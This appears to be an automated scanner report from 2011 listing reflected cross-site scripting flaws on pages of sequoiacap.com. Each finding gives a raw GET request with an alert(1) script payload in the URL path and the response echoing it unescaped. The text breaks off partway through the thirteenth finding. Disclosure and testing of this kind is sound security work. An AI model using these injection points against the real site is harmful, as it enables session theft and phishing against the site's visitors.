XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, sequoiacap.com

Report generated by XSS.CX at Thu Oct 13 05:18:56 CDT 2011.


Loading


1. Cross-site scripting (reflected)

1.1. http://www.sequoiacap.com/favicon.ico [REST URL parameter 1]

1.2. http://www.sequoiacap.com/ideas [REST URL parameter 1]

1.3. http://www.sequoiacap.com/images/blinking_cursor.gif [REST URL parameter 2]

1.4. http://www.sequoiacap.com/images/sequoia_capital_leaf_logo_over.gif [REST URL parameter 2]

1.5. http://www.sequoiacap.com/javascripts/home.js [REST URL parameter 2]

1.6. http://www.sequoiacap.com/javascripts/sc.js [REST URL parameter 2]

1.7. http://www.sequoiacap.com/stylesheets/jquery.hoverscroll.css [REST URL parameter 2]

1.8. http://www.sequoiacap.com/stylesheets/seq.css [REST URL parameter 2]

1.9. http://www.sequoiacap.com/us/contact [REST URL parameter 1]

1.10. http://www.sequoiacap.com/us/contact [REST URL parameter 2]

1.11. http://www.sequoiacap.com/us/early [REST URL parameter 1]

1.12. http://www.sequoiacap.com/us/early [REST URL parameter 2]

1.13. http://www.sequoiacap.com/us/seed [REST URL parameter 1]

1.14. http://www.sequoiacap.com/us/seed [REST URL parameter 2]



1. Cross-site scripting (reflected)
There are 14 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.sequoiacap.com/favicon.ico [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sequoiacap.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 42fa0<script>alert(1)</script>cf97f530072 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /42fa0<script>alert(1)</script>cf97f530072 HTTP/1.1
Host: www.sequoiacap.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _chartbeat2=4btrmeuxxy3jdwvq.1318500669275; __utmx=10332215.; __utmxx=10332215.; __utma=10332215.1042707743.1318500669.1318500669.1318500669.1; __utmb=10332215.3.10.1318500669; __utmc=10332215; __utmz=10332215.1318500669.1.1.utmcsr=jivesoftware.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/investors; __utmv=10332215.autoregion%3Dus; hubspotdt=2011-10-13%2006%3A10%3A36; hubspotutk=1c36ebc87e634cd4929fa8b88b4fcea3; hubspotvd=1c36ebc87e634cd4929fa8b88b4fcea3; hubspotvw=1c36ebc87e634cd4929fa8b88b4fcea3; hubspotvm=1c36ebc87e634cd4929fa8b88b4fcea3; hsfirstvisit=http%3A%2F%2Fwww.sequoiacap.com%2F|http%3A%2F%2Fwww.jivesoftware.com%2Fabout%2Finvestors|2011-10-13%2006%3A10%3A36

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Cache-Control: no-cache
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)
Content-Length: 7175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=
...[SNIP]...
<strong>/42fa0<script>alert(1)</script>cf97f530072</strong>
...[SNIP]...

1.2. http://www.sequoiacap.com/ideas [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sequoiacap.com
Path:   /ideas

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ab407<script>alert(1)</script>342f00cb570 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ideasab407<script>alert(1)</script>342f00cb570 HTTP/1.1
Host: www.sequoiacap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sequoiacap.com/us/early
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=1c36ebc87e634cd4929fa8b88b4fcea3; hubspotvd=1c36ebc87e634cd4929fa8b88b4fcea3; hubspotvw=1c36ebc87e634cd4929fa8b88b4fcea3; hubspotvm=1c36ebc87e634cd4929fa8b88b4fcea3; hsfirstvisit=http%3A%2F%2Fwww.sequoiacap.com%2F|http%3A%2F%2Fwww.jivesoftware.com%2Fabout%2Finvestors|2011-10-13%2006%3A10%3A36; last_visited_region=2; _chartbeat2=4btrmeuxxy3jdwvq.1318500669275; __utmx=10332215.; __utmxx=10332215.; __utma=10332215.1042707743.1318500669.1318500669.1318500669.1; __utmb=10332215.10.10.1318500669; __utmc=10332215; __utmz=10332215.1318500669.1.1.utmcsr=jivesoftware.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/investors; __utmv=10332215.autoregion%3Dus; hubspotdt=2011-10-13%2006%3A11%3A13

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Cache-Control: no-cache
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)
Content-Length: 7185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=
...[SNIP]...
<strong>/ideasab407<script>alert(1)</script>342f00cb570</strong>
...[SNIP]...

1.3. http://www.sequoiacap.com/images/blinking_cursor.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sequoiacap.com
Path:   /images/blinking_cursor.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 24bf4<script>alert(1)</script>b637d5797b2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/24bf4<script>alert(1)</script>b637d5797b2?1318217760 HTTP/1.1
Host: www.sequoiacap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sequoiacap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Cache-Control: no-cache
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)
Content-Length: 7179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=
...[SNIP]...
<strong>/images/24bf4<script>alert(1)</script>b637d5797b2?1318217760</strong>
...[SNIP]...

1.4. http://www.sequoiacap.com/images/sequoia_capital_leaf_logo_over.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sequoiacap.com
Path:   /images/sequoia_capital_leaf_logo_over.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3b986<script>alert(1)</script>9121b992f56 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/3b986<script>alert(1)</script>9121b992f56?1318217760 HTTP/1.1
Host: www.sequoiacap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sequoiacap.com/us/seed
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _chartbeat2=4btrmeuxxy3jdwvq.1318500669275; __utmx=10332215.; __utmxx=10332215.; __utma=10332215.1042707743.1318500669.1318500669.1318500669.1; __utmb=10332215.3.10.1318500669; __utmc=10332215; __utmz=10332215.1318500669.1.1.utmcsr=jivesoftware.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/investors; __utmv=10332215.autoregion%3Dus; hubspotdt=2011-10-13%2006%3A10%3A36; hubspotutk=1c36ebc87e634cd4929fa8b88b4fcea3; hubspotvd=1c36ebc87e634cd4929fa8b88b4fcea3; hubspotvw=1c36ebc87e634cd4929fa8b88b4fcea3; hubspotvm=1c36ebc87e634cd4929fa8b88b4fcea3; hsfirstvisit=http%3A%2F%2Fwww.sequoiacap.com%2F|http%3A%2F%2Fwww.jivesoftware.com%2Fabout%2Finvestors|2011-10-13%2006%3A10%3A36; last_visited_region=2

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Cache-Control: no-cache
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)
Content-Length: 7179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=
...[SNIP]...
<strong>/images/3b986<script>alert(1)</script>9121b992f56?1318217760</strong>
...[SNIP]...

1.5. http://www.sequoiacap.com/javascripts/home.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sequoiacap.com
Path:   /javascripts/home.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bda04<script>alert(1)</script>8c7998afe0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascripts/bda04<script>alert(1)</script>8c7998afe0e?1318217760 HTTP/1.1
Host: www.sequoiacap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sequoiacap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Cache-Control: no-cache
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)
Content-Length: 7189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=
...[SNIP]...
<strong>/javascripts/bda04<script>alert(1)</script>8c7998afe0e?1318217760</strong>
...[SNIP]...

1.6. http://www.sequoiacap.com/javascripts/sc.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sequoiacap.com
Path:   /javascripts/sc.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ea853<script>alert(1)</script>0d10ad6340f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascripts/ea853<script>alert(1)</script>0d10ad6340f?1318217760 HTTP/1.1
Host: www.sequoiacap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sequoiacap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Cache-Control: no-cache
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)
Content-Length: 7189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=
...[SNIP]...
<strong>/javascripts/ea853<script>alert(1)</script>0d10ad6340f?1318217760</strong>
...[SNIP]...

1.7. http://www.sequoiacap.com/stylesheets/jquery.hoverscroll.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sequoiacap.com
Path:   /stylesheets/jquery.hoverscroll.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bb50b<script>alert(1)</script>d593ccfc0ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /stylesheets/bb50b<script>alert(1)</script>d593ccfc0ff?1318217771 HTTP/1.1
Host: www.sequoiacap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.sequoiacap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Cache-Control: no-cache
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)
Content-Length: 7189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=
...[SNIP]...
<strong>/stylesheets/bb50b<script>alert(1)</script>d593ccfc0ff?1318217771</strong>
...[SNIP]...

1.8. http://www.sequoiacap.com/stylesheets/seq.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sequoiacap.com
Path:   /stylesheets/seq.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c4d11<script>alert(1)</script>7ad6cfafdc0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /stylesheets/c4d11<script>alert(1)</script>7ad6cfafdc0?1318217771 HTTP/1.1
Host: www.sequoiacap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.sequoiacap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Cache-Control: no-cache
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)
Content-Length: 7189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=
...[SNIP]...
<strong>/stylesheets/c4d11<script>alert(1)</script>7ad6cfafdc0?1318217771</strong>
...[SNIP]...

1.9. http://www.sequoiacap.com/us/contact [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sequoiacap.com
Path:   /us/contact

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6f027<script>alert(1)</script>6c919f8ebbc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us6f027<script>alert(1)</script>6c919f8ebbc/contact HTTP/1.1
Host: www.sequoiacap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sequoiacap.com/ideas
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=1c36ebc87e634cd4929fa8b88b4fcea3; hubspotvd=1c36ebc87e634cd4929fa8b88b4fcea3; hubspotvw=1c36ebc87e634cd4929fa8b88b4fcea3; hubspotvm=1c36ebc87e634cd4929fa8b88b4fcea3; hsfirstvisit=http%3A%2F%2Fwww.sequoiacap.com%2F|http%3A%2F%2Fwww.jivesoftware.com%2Fabout%2Finvestors|2011-10-13%2006%3A10%3A36; last_visited_region=2; _chartbeat2=4btrmeuxxy3jdwvq.1318500669275; __utmx=10332215.; __utmxx=10332215.; __utma=10332215.1042707743.1318500669.1318500669.1318500669.1; __utmb=10332215.13.10.1318500669; __utmc=10332215; __utmz=10332215.1318500669.1.1.utmcsr=jivesoftware.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/investors; __utmv=10332215.autoregion%3Dus; hubspotdt=2011-10-13%2006%3A11%3A46; __qca=P0-69840524-1318500742777

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Cache-Control: no-cache
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)
Content-Length: 7187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=
...[SNIP]...
<strong>/us6f027<script>alert(1)</script>6c919f8ebbc/contact</strong>
...[SNIP]...

1.10. http://www.sequoiacap.com/us/contact [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sequoiacap.com
Path:   /us/contact

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 53a2f<script>alert(1)</script>159df04f5d5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/contact53a2f<script>alert(1)</script>159df04f5d5 HTTP/1.1
Host: www.sequoiacap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sequoiacap.com/ideas
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=1c36ebc87e634cd4929fa8b88b4fcea3; hubspotvd=1c36ebc87e634cd4929fa8b88b4fcea3; hubspotvw=1c36ebc87e634cd4929fa8b88b4fcea3; hubspotvm=1c36ebc87e634cd4929fa8b88b4fcea3; hsfirstvisit=http%3A%2F%2Fwww.sequoiacap.com%2F|http%3A%2F%2Fwww.jivesoftware.com%2Fabout%2Finvestors|2011-10-13%2006%3A10%3A36; last_visited_region=2; _chartbeat2=4btrmeuxxy3jdwvq.1318500669275; __utmx=10332215.; __utmxx=10332215.; __utma=10332215.1042707743.1318500669.1318500669.1318500669.1; __utmb=10332215.13.10.1318500669; __utmc=10332215; __utmz=10332215.1318500669.1.1.utmcsr=jivesoftware.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/investors; __utmv=10332215.autoregion%3Dus; hubspotdt=2011-10-13%2006%3A11%3A46; __qca=P0-69840524-1318500742777

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Set-Cookie: last_visited_region=2; path=/; expires=Thu, 13-Oct-2011 10:25:55 GMT
Cache-Control: no-cache
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)
Content-Length: 7126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=
...[SNIP]...
<strong>/us/contact53a2f<script>alert(1)</script>159df04f5d5</strong>
...[SNIP]...

1.11. http://www.sequoiacap.com/us/early [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sequoiacap.com
Path:   /us/early

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 18ef2<script>alert(1)</script>472a7c6f7da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us18ef2<script>alert(1)</script>472a7c6f7da/early HTTP/1.1
Host: www.sequoiacap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sequoiacap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=1c36ebc87e634cd4929fa8b88b4fcea3; hubspotvd=1c36ebc87e634cd4929fa8b88b4fcea3; hubspotvw=1c36ebc87e634cd4929fa8b88b4fcea3; hubspotvm=1c36ebc87e634cd4929fa8b88b4fcea3; hsfirstvisit=http%3A%2F%2Fwww.sequoiacap.com%2F|http%3A%2F%2Fwww.jivesoftware.com%2Fabout%2Finvestors|2011-10-13%2006%3A10%3A36; last_visited_region=2; _chartbeat2=4btrmeuxxy3jdwvq.1318500669275; __utmx=10332215.; __utmxx=10332215.; __utma=10332215.1042707743.1318500669.1318500669.1318500669.1; __utmb=10332215.8.10.1318500669; __utmc=10332215; __utmz=10332215.1318500669.1.1.utmcsr=jivesoftware.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/investors; __utmv=10332215.autoregion%3Dus; hubspotdt=2011-10-13%2006%3A10%3A55

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Cache-Control: no-cache
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)
Content-Length: 7185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=
...[SNIP]...
<strong>/us18ef2<script>alert(1)</script>472a7c6f7da/early</strong>
...[SNIP]...

1.12. http://www.sequoiacap.com/us/early [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sequoiacap.com
Path:   /us/early

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3acbb<script>alert(1)</script>9b62011dcb4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/early3acbb<script>alert(1)</script>9b62011dcb4 HTTP/1.1
Host: www.sequoiacap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sequoiacap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=1c36ebc87e634cd4929fa8b88b4fcea3; hubspotvd=1c36ebc87e634cd4929fa8b88b4fcea3; hubspotvw=1c36ebc87e634cd4929fa8b88b4fcea3; hubspotvm=1c36ebc87e634cd4929fa8b88b4fcea3; hsfirstvisit=http%3A%2F%2Fwww.sequoiacap.com%2F|http%3A%2F%2Fwww.jivesoftware.com%2Fabout%2Finvestors|2011-10-13%2006%3A10%3A36; last_visited_region=2; _chartbeat2=4btrmeuxxy3jdwvq.1318500669275; __utmx=10332215.; __utmxx=10332215.; __utma=10332215.1042707743.1318500669.1318500669.1318500669.1; __utmb=10332215.8.10.1318500669; __utmc=10332215; __utmz=10332215.1318500669.1.1.utmcsr=jivesoftware.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/investors; __utmv=10332215.autoregion%3Dus; hubspotdt=2011-10-13%2006%3A10%3A55

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Set-Cookie: last_visited_region=2; path=/; expires=Thu, 13-Oct-2011 10:21:18 GMT
Cache-Control: no-cache
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)
Content-Length: 7122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=
...[SNIP]...
<strong>/us/early3acbb<script>alert(1)</script>9b62011dcb4</strong>
...[SNIP]...

1.13. http://www.sequoiacap.com/us/seed [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sequoiacap.com
Path:   /us/seed

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 86457<script>alert(1)</script>637300b260d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us86457<script>alert(1)</script>637300b260d/seed HTTP/1.1
Host: www.sequoiacap.com
Proxy-Connection: keep-alive
